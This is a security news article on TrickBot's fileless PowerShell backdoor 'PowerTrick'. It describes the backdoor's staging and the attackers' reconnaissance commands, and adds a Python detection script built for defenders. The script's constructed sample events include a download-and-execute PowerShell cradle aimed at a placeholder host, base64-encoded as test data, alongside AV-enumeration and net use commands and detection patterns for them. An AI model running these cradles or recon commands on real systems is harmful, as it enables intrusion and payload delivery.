Researchers have uncovered new activity from the Russia-based cybercrime group behind the “TrickBot” trojan: the group has added a newly developed, fileless PowerShell backdoor named “PowerTrick” to its arsenal and is using it against high-profile targets.
PowerTrick is built for stealth, persistence and reconnaissance on targets such as financial institutions. Like most of the tooling in this group’s arsenal, it is a post-exploitation tool that is meant to live on the target network only for a short period.
Researchers believe TrickBot is the successor of the Dyre banking trojan, which relied on web-injection systems. TrickBot later shifted its focus to enterprise environments and adopted new tactics and techniques.
TrickBot now attempts network profiling, mass data collection, and the incorporation of lateral-movement exploits.
The new fileless, stealthy “PowerTrick” backdoor was developed with features that make it flexible and effective enough that the operators no longer need to rely on other tools, such as PowerShell Empire, during the post-exploitation phase.
The main goal of PowerTrick is to bypass restrictions and security controls on highly protected networks while keeping a low profile, so that the operators can work inside networks with a high level of security.
PowerTrick Discovery and Infection Process
The initial stage of a PowerTrick attack is a PowerShell task pushed through a normal TrickBot infection with the help of the backconnect module called “NewBCtest”.
Once that first stage of the backdoor is running, the attackers issue a command intended to download a larger backdoor.
According to SentinelLabs research, “PowerTrick is designed to execute commands and return the results in Base64 format, the system uses a generated UUID based on computer information as a ‘botID.’”
The attackers also use other PowerShell utilities for various tasks; in this case, they frequently used the PowerShell stager of the open-source exploitation framework Metasploit.
The attackers also ran the following commands on compromised hosts during reconnaissance:
net use with usernames, to check which permissions the captured accounts have on other systems
WMIC /node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
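As an added example (not code from the SentinelLabs report or from this article), the Python snippet below turns the two reconnaissance commands listed above into detection logic over process-creation telemetry. It flags the SecurityCenter2 AntiVirusProduct query and net use share access, unwraps a base64 -EncodedCommand PowerShell line of the kind a PowerShell stager uses, applies the same rules to the decoded script, and notes when the recon tool was spawned by PowerShell. The flattened Sysmon-style log format, the sample events and the stager URL (a reserved .invalid host) are constructed for this example.

```python
import base64
import re
from typing import Optional

# Detection rules applied to the command line (and to any decoded PowerShell).
# Case-insensitive because neither cmd.exe nor PowerShell cares about case.
RECON_RULES = {
    # WMIC query of the SecurityCenter2 namespace to enumerate installed AV.
    "av_enumeration_securitycenter2": re.compile(
        r"securitycenter2.*antivirusproduct", re.IGNORECASE),
    # net use / net1 use to map shares and test credentials against other hosts.
    "net_use_share_access": re.compile(
        r"(?:^|\W)net1?(?:\.exe)?\s+use\b", re.IGNORECASE),
    # Download cradles commonly used by PowerShell stagers.
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.IGNORECASE),
}

# -EncodedCommand plus the common unambiguous abbreviations PowerShell accepts.
ENCODED_CMD_RE = re.compile(
    r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Fields of the constructed one-line event format used below.
FIELD_RE = {
    "image": re.compile(r"(?:^|\s)Image=(\S+)"),
    "command_line": re.compile(r'CommandLine="([^"]*)"'),
    "parent_image": re.compile(r"(?:^|\s)ParentImage=(\S+)"),
}


def encode_powershell(script: str) -> str:
    """Base64 of the UTF-16LE script, the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Reverse encode_powershell; None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    fields = {}
    for name, rx in FIELD_RE.items():
        m = rx.search(line)
        fields[name] = m.group(1) if m else ""
    return fields


def analyze(line: str) -> dict:
    """Return the parsed event plus the list of rules it tripped."""
    ev = parse_event(line)
    cmd = ev["command_line"]
    hits = [name for name, rx in RECON_RULES.items() if rx.search(cmd)]
    decoded = None
    m = ENCODED_CMD_RE.search(cmd)
    if m:
        decoded = decode_powershell(m.group(1))
        if decoded is not None:
            hits.append("powershell_encoded_command")
            # The visible command line hides the payload; rescan the decoded script.
            hits += [name for name, rx in RECON_RULES.items()
                     if rx.search(decoded) and name not in hits]
    # Recon tools launched from PowerShell fit the PowerTrick tasking model.
    if hits and ev["parent_image"].lower().endswith("powershell.exe"):
        hits.append("spawned_by_powershell")
    return {**ev, "hits": hits, "decoded": decoded}


def triage(lines) -> list:
    """Keep only the events that tripped at least one rule."""
    return [r for r in (analyze(line) for line in lines) if r["hits"]]


# Constructed sample events (assumed format, not real telemetry).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stager.invalid/s')"
SAMPLE_EVENTS = [
    f'Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine="WMIC /node:localhost '
    f'/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName '
    f'/Format:List" ParentImage={PS_EXE}',
    f'Image=C:\\Windows\\System32\\net.exe CommandLine="net use \\\\FILESRV01\\C$ '
    f'/user:CORP\\svc_backup" ParentImage={PS_EXE}',
    f'Image={PS_EXE} CommandLine="powershell.exe -NoP -W Hidden -EncodedCommand '
    f'{encode_powershell(STAGER)}" ParentImage=C:\\Windows\\explorer.exe',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe '
    'C:\\Users\\alice\\notes.txt" ParentImage=C:\\Windows\\explorer.exe',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["image"], hit["hits"], hit["decoded"] or "")
```

The SecurityCenter2 query is also run by legitimate inventory scripts, so in production the parent-process and encoded-command conditions carry most of the weight; the AV-enumeration rule alone is a low-confidence signal.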
Once they have gathered the relevant data from the compromised network, the attackers carry out deletion and cleanup operations and then move on to a different, higher-value target on the network, such as financial gateways.